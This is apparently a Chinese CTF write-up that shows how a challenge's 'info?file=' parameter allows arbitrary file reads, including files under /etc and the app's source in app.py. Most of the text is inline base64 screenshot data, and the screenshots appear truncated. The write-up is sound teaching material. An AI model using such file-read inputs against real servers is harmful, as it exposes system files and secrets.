<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160414-03d32a22-b53b-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>随便点点<br>
|
|||
|
|
观察我们的 url 头</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nl>http:</span><span class=c1>//125.70.243.22:31197/info?file=%E6%B4%9B%E7%A5%9E%E8%B5%8B%E5%9B%BE.txt</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>很明显可能存在任意文件读取或者包含</p>
|
|||
|
|
<p>etc 是能够读取的,尝试读取 flag</p>
|
|||
|
|
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160408-005f3368-b53b-1.png><img src=data:image/png;base64,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
|
|||
|
|
<p>没有,老老实实读源码吧</p>
|
|||
|
|
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160404-fe3bab52-b53a-1.png title><img src=data:image/png;base64,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
|
|||
|
|
<p>php 写的,这是最坑的一点,明明就是python 写的,这里卡了一会,然后尝试读取 app.py</p>
|
|||
|
|
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160400-fbadc118-b53a-1.png title><img src="data:image/png;base64,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